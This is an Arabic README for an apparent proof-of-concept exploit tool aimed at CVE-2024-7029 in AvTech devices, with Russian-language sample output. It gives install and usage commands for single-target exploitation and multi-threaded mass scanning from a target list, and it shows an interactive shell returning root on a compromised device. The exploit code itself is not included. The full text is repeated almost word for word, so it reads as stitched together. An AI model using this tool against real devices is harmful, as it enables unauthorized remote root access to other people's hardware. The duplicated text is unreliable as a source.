
استغلال إثبات المفهوم (PoC) لثغرة CVE-2024-7029 المكتشفة في أجهزة AvTech، مما يتيح تنفيذ التعليمات البرمجية عن بُعد (RCE)
GenAvTechRCEExploit هي أداة استغلال PoC لثغرة CVE-2024-7029 الموجودة في أجهزة AvTech، مما يتيح تنفيذ التعليمات البرمجية عن بُعد (RCE). يمكن لهذه الأداة فحص الأجهزة المعرّضة للثغرة وتنفيذ الأوامر عليها بشكل تفاعلي.
requestsprompt_toolkitalive_progressثبّت المكتبات المطلوبة باستخدام:
pip install -r requirements.txt
للتحقق من وجود الثغرة في هدف واحد وبدء صدفة تفاعلية:
python3 GenAvTechRCEExploit.py -u <target_url>
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100
[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки
استبدل <target_url> بعنوان URL الفعلي للجهاز الهدف.
لفحص عدة أهداف مدرجة في ملف (عنوان URL واحد في كل سطر):
python3 GenAvTechRCEExploit.py -f <file_path>
$ python3 GenAvTechRCEExploit.py -f targets.txt
Scanning Targets |████████████████████████████████████████| 100%
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима
استبدل <file_path> بمسار ملفك الذي يحتوي على عناوين URL للأهداف.
يمكنك تحديد عدد الخيوط المستخدمة في الفحص باستخدام الخيار -t:
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>
افتراضيًا، يتم ضبط عدد الخيوط على 10.
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20
GenAvTechRCEExploit - استغلال لثغرة CVE-2024-7029 في أجهزة AvTech، مما يتيح تنفيذ التعليمات البرمجية عن بُعد (RCE). يمكن لهذه الأداة فحص الأجهزة المعرّضة للثغرة وتنفيذ الأوامر عليها في الوضع التفاعلي.
requestsprompt_toolkitalive_progressيمكن تثبيت المكتبات المطلوبة باستخدام:
pip install -r requirements.txt
للتحقق من وجود الثغرة في هدف واحد وبدء صدفة تفاعلية:
python3 GenAvTechRCEExploit.py -u <target_url>
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100
[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки
استبدل <target_url> بعنوان URL الحقيقي للجهاز الهدف.
لفحص عدة أهداف محددة في ملف (عنوان URL واحد في كل سطر):
python3 GenAvTechRCEExploit.py -f <file_path>
$ python3 GenAvTechRCEExploit.py -f targets.txt
Scanning Targets |████████████████████████████████████████| 100%
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима
استبدل <file_path> بمسار الملف الذي يحتوي على عناوين URL للأهداف.
يمكنك تحديد عدد الخيوط لاستخدامها في الفحص باستخدام الخيار -t:
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>
افتراضيًا، عدد الخيوط مضبوط على 10.
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20